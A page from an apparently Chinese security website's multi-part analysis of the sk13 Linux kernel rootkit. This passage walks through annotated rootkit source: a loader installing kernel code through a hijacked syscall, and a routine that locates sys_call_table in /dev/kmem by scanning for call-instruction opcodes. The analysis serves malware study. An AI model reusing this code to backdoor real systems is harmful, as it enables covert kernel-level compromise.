首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>病毒分析>文章内容
Linux后门系列--由浅入深sk13完全分析
来源:http://xsec.org 作者:wzt 发布时间:2009-05-04  

                                                |
                                                |
                                                |
                                                V
                             +--------------------------------------+
    老的sys_call_table[]数组 |                 |                    |
                              +--------------------------------------+
                                                ^
                                                |
                                            oldolduname
        */


    /*

    KINT同KMALLOC一样都是去执行oldolduname,然后就可以执行kernel.c/kernel_init了,是不是很巧妙呢

    注意:从这以后就开始转向kernel.c/kernel_init()函数了

    */

       KINIT(mem, sct, sctp, oldsys);

       printf("Done, %d bytes, base=0x%08x\n", (int) size, (uint) mem);
       return 0;
    }


    pattern.c/get_sct:

    作用:根据system_call函数地址找到sys_call_table[]数组地址


    代码分析:

    ulong    get_sct(int fd, ulong ep, ulong *pos)
    {
    #define    SCLEN    512
       char    code[SCLEN];
       char    *p;
       ulong    r;

    /*
        从kmem的ep(system_call的地址)偏移位置读取512字节到code缓冲区中
    */

       if (rkm(fd, code, sizeof(code), ep) <= 0)
          return 0;

    /*

        在code缓冲区中匹配搜寻\xff\x14\x85

        注意:call something<,eax,4)指令的机器码是0xff 0x14 0x85 0x
        p的地址是call something<,eax,4)机器码的首地址,要得到sys_call_table的地址还得在+3


    */
       p = (char *) memmem(code, SCLEN, "\xff\x14\x85", 3);
       if (!p) return 0;


    /*
        (p+3) - code 是sys_call_table相对code的偏移量,在+ep,也就是sys_call_table的地址,
        与r的值是一样的

    */
       pos[0] = ep + ((p + 3) - code);
共11页: 上一页 [1] [2] [3] [4] [5] 6 [7] [8] [9] [10] [11] 下一页
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·Word溢出Shellcode分析
·浅谈反病毒技术的前世今生
·Ie0dayCVE0806.c 变种网马样本分
·Web应用漏洞的大规模攻击案例分
·Ie0dayCVE0806网马样本分析
·Witty病毒通过ISS的防火墙产品和
·酷狗音乐首页隐蔽挂马详细分析+7
·Net-Worm.Win32.Dasher(黛蛇)蠕
·熊猫烧香病毒分析与解决方案
·卡巴斯基(AVP)内存驻留型病毒检
·104种木马手工清除方法
·avserve病毒初步分析
  相关文章
·Word溢出Shellcode分析
·酷狗音乐首页隐蔽挂马详细分析+7
·熊猫烧香病毒分析与解决方案
·Ie0dayCVE0806网马样本分析
·Ie0dayCVE0806.c 变种网马样本分
·卡巴斯基(AVP)内存驻留型病毒检
·Net-Worm.Win32.Dasher(黛蛇)蠕
·浅谈反病毒技术的前世今生
·avserve病毒初步分析
·Witty病毒通过ISS的防火墙产品和
·104种木马手工清除方法
·Web应用漏洞的大规模攻击案例分
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved